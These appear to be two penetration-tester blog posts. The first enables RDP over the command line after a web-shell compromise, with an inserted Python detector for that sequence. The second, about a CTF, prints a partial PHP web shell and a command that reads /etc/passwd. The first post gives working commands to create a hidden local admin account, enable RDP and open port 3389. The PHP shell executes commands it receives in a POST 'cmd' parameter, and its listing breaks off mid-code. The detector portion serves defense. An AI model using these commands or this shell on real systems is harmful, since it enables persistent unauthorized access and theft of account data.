Enable RDP via Command line

Been extremely busy with loads of work. Anyway, here's something interesting that I needed to do recently on a customer network to gain access to a server.

I managed to obtain a web application shell on the server and was able to execute commands as Administrator. The application was running on XAMPP under an administrative account, so I was lucky there. But what I needed was GUI access to the desktop, because I wanted to compromise another server that was reachable through a custom-programmed application running on the server I had just gained access to. Here's what I did:

1. Created a user, added it to the local Administrators group and displayed the new account to confirm it exists, using these commands:

net user newadmin newpa$$w0rd /add
net localgroup administrators newadmin /add
net user newadmin

2. Used the following commands to enable Remote Desktop (setting fDenyTSConnections to 0) and open TCP 3389 in the Windows Firewall, then logged in over RDP with my new credentials (the netsh firewall context is the legacy one; on Windows Vista/7 and later it is superseded by netsh advfirewall firewall):

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall set portopening TCP 3389

3. Bit off a large chunk of some awesome tasting chicken sandwich, sipped some coffee and then proceeded with the rest of the Penetration Test.

A lot of penetration testers reach this wall at some point during their assessments. Hope this helps some tired soul like me.
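As an added example that is not part of the original post, here is the defender's side of steps 1 and 2: a small Python detector run over constructed process-creation records (Windows Security event 4688 with command-line auditing, or Sysmon event 1) that flags a host where the account-creation, local-admin, fDenyTSConnections and port-3389 commands show up within one time window. The record layout, host names, users and timestamps are assumptions; the patterns match the commands above plus the newer netsh advfirewall form.

```python
import re
from datetime import datetime, timedelta

# Constructed sample records: Windows Security event 4688 (process creation with
# command-line auditing on) or Sysmon event 1, flattened to dicts. Field names,
# host names, users and timestamps are assumptions made for this example.
SAMPLE_EVENTS = [
    {"host": "WEB01", "time": "2024-01-01T09:58:00", "user": "WEB01\\Administrator",
     "cmdline": "net user"},                                   # plain listing, no stage
    {"host": "WEB01", "time": "2024-01-01T10:05:10", "user": "WEB01\\Administrator",
     "cmdline": "net user newadmin newpa$$w0rd /add"},
    {"host": "WEB01", "time": "2024-01-01T10:05:14", "user": "WEB01\\Administrator",
     "cmdline": "net localgroup administrators newadmin /add"},
    {"host": "WEB01", "time": "2024-01-01T10:06:02", "user": "WEB01\\Administrator",
     "cmdline": 'reg add "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal '
                'Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"host": "WEB01", "time": "2024-01-01T10:06:30", "user": "WEB01\\Administrator",
     "cmdline": "netsh firewall set portopening TCP 3389"},
    {"host": "FILE02", "time": "2024-01-01T11:00:00", "user": "CORP\\helpdesk",
     "cmdline": "net localgroup administrators"},              # listing only, no stage
]

# One pattern per stage of the sequence described on the page. The netsh pattern
# also accepts the newer "netsh advfirewall firewall ... localport=3389" form.
STAGES = [
    ("local_user_created", re.compile(r"\bnet(?:1|\.exe)?\s+user\s+\S+.*?\s/add\b", re.I)),
    ("added_to_local_admins", re.compile(r"\bnet(?:1|\.exe)?\s+localgroup\s+administrators\s+\S+.*?\s/add\b", re.I)),
    ("rdp_enabled_in_registry", re.compile(r"\breg(?:\.exe)?\s+add\b.*\bfDenyTSConnections\b.*/d\s+0\b", re.I)),
    ("firewall_opened_3389", re.compile(r"\bnetsh(?:\.exe)?\b.*(?:portopening\s+tcp\s+3389|localport\s*=\s*3389)\b", re.I)),
]

def detect_rdp_enablement(events, window_minutes=30):
    """Report each host where two or more distinct stages fall inside one window.
    A lone stage (a helpdesk user listing or adding an admin) is not reported."""
    hits = {}
    for ev in events:
        for stage, pattern in STAGES:
            if pattern.search(ev["cmdline"]):
                hits.setdefault(ev["host"], []).append(
                    (datetime.fromisoformat(ev["time"]), stage, ev["user"]))
    findings, window = [], timedelta(minutes=window_minutes)
    for host, rows in hits.items():
        rows.sort()
        for i, (t0, _, user) in enumerate(rows):    # try a window starting at each hit
            stages = {s for t, s, _ in rows[i:] if t - t0 <= window}
            if len(stages) >= 2:
                findings.append({"host": host, "user": user, "stages": sorted(stages)})
                break
    return findings
```

Running this against a real host needs command-line logging for 4688 (or Sysmon) enabled first, since the default Security log records only the process name.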

Happy Hacking!

Simple PHP Web Application Backdoor

The Hack In the Box CTF PreQuals 2011 had hackers from all over the world rack their brains against a Windows Binary and a Web Application. The challenge was to submit the MD5 sum of a flag either from the binary or from the application server. Somewhere between the night of March 19th and the early morning of March 20th, a group of hackers from India managed to crack the Web Application challenge.

The web application in question had a Local File Inclusion (LFI) vulnerability. The web server also had its FTP port open and permitted anonymous login and file upload. It was then only a matter of time before people who found this started uploading web application shells, which could then be included from the application's home page. A simple Google search turns up tons of shells that let an attacker do an awesome amount of stuff at the mere click of a button: commands prebuilt into the page search for world-readable files, open reverse-connect shells, bind ports to /bin/bash, upload and download files, and so on. But most of these shells are detected by antivirus software and flagged as malicious. Since I only needed a simple execution interface, I decided to write a shell from scratch. Here's the code:

<?php
// simple php shell PoC - karniv0re

// System Info
echo "/etc/issue:\t".exec ("cat /etc/issue")."\n";
echo "uname -a:\t".exec ("uname -a")."\n";
echo "id:\t\t".exec("id")."\n";
echo "current wd:\t".exec ("pwd")."\n";

// Command Output
$cmd = $_POST['cmd'];
if (strlen($cmd)==0){
    $cmd = "true";
}
// the rest of the original listing was cut off here

Once you have uploaded the shell and can reach it, you can list the accounts on the box (username, UID and login shell) by running:

awk -F ":" '{ print $1 "[" $3 "]" "[" $7 "]"}' /etc/passwd

Feel free to modify it and add features, but remember there are plenty of shells out there doing much more awesome stuff than merely executing a command and displaying its output.

Happy Hacking!